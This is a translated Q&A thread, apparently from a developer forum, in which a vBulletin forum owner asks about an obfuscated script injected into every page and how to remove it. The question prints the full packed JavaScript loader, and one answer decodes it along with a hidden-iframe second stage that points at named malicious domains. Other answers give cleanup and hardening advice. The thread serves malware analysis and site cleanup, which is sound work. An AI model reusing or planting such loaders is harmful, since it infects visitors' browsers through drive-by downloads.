Удалить вредоносные программы с сайта

Question

Мой сайт, 3dsforums.com, был помечен как сайт для атаки на вредоносные программы.Согласно Google Webmaster Tools, это подозрительный код, который был вставлен на каждую страницу:

<script>eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c ]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 1=4.5(\'6\');1.7=\'8://9-a.b/ c.d.1\';3 2=4.e(\'2\')[0];2.f(1);',16,16,'|js|head|var|document|createElement|script|src|http|javascript|collection|in|jquery|compatibility|getElementsByTagName|appendChild'.split('|'),0,{}))</script>

Таким образом, у меня есть два вопроса:

Является ли это на самом деле оскорбительным кодом?

И как мне это удалить?

Кажется, я не могу найти его через шаблоны в vBulletin или через phpmyadmin, так что я заблудился относительно того, что мне следует делать.

Спасибо за любую помощь.

Answer 1

JS Beautifier распаковывает это так:

var js = document.createElement('script');
js.src = 'http://javascript-collection.in/ jquery.compatibility.js';
var head = document.getElementsByTagName('head')[0];
head.appendChild(js);

Это выглядит подозрительно (кто бы это запутал?), Поэтому я бы предположил, что да, это проблема, и вы должны устранить ее.

Редактировать: Теперь, когда вредоносный сайт вернулся, я могу проанализировать остальное: кажется, что он добавляет iframe:

var iframe = document.createElement('iframe');
iframe.src = 'http://gamessilver.in/in.cgi?walter';
iframe.width = 0;
iframe.height = 0;
iframe.vspace = 0;
iframe.hspace = 0;
iframe.frameborder = 0;
iframe.marginheight = 0;
iframe.marginwidth = 0;
var head = document.getElementsByTagName('head')[0];
head.appendChild(iframe);

Как-то странно добавлять его в head.

Сценарий in.cgi появляется для перенаправления в Google, если User-Agent не очень подходит для использования. В противном случае он перенаправляется на другой вредоносный веб-сайт.

Он продолжает ветвиться со многими iframe с. Многие из них ничего не делают (хотя в тот момент я только пробовал User-Agent для MSIE 6 на WinXP), но в итоге я получил два Java-апплета. Когда я декомпилировал их, все имена были искажены, и я не стал пытаться понять, что он делает.

Answer 2

Первое, что вам нужно сделать, это сменить логин и пароль на FTP или SSH.

Вышеприведенное выглядит как эксплойт FTP. Похоже, либо вы устарели с обновлениями вашей ОС, либо вы позволяете всему миру записывать ваши файлы.

Даже если вы перезаписали свои файлы, проблема может вернуться. Поэтому я настоятельно рекомендую проверить

1. обратите внимание на дату последнего изменения указанных файлов.
2. проверьте ваш FTP, SSH, доступ к журналам, чтобы увидеть, можете ли вы найти что-то подозрительное. 1a. Немедленно удалите доступ на запись ко всем файлам сайта. Делайте это в качестве меры предосторожности, чтобы быть в безопасности от подобной атаки. 1б. Перезаписать ваши файлы из резервной копии
3. если ваш apache или любой используемый вами веб-сервер не имеет ожидающих обновлений.
4. Проверьте разрешение файла для вашего сайта
5. Немедленно измените свой пароль FTP

Посоветуйте: смените свои пароли на что-нибудь надежное. например KLioof * (& ^ paswl

Answer 3

Я решил эту проблему.Вы должны найти и удалить функцию Base64 с теневой строкой в ​​файлах сайта.Он декодирует этот скрипт из строки.

Answer 4

На самом деле он скрывался в include / functions.php в строках 6844 и 6845, две строки заменяли </head> на their script+</head>

Трудная для поиска и умная тоже.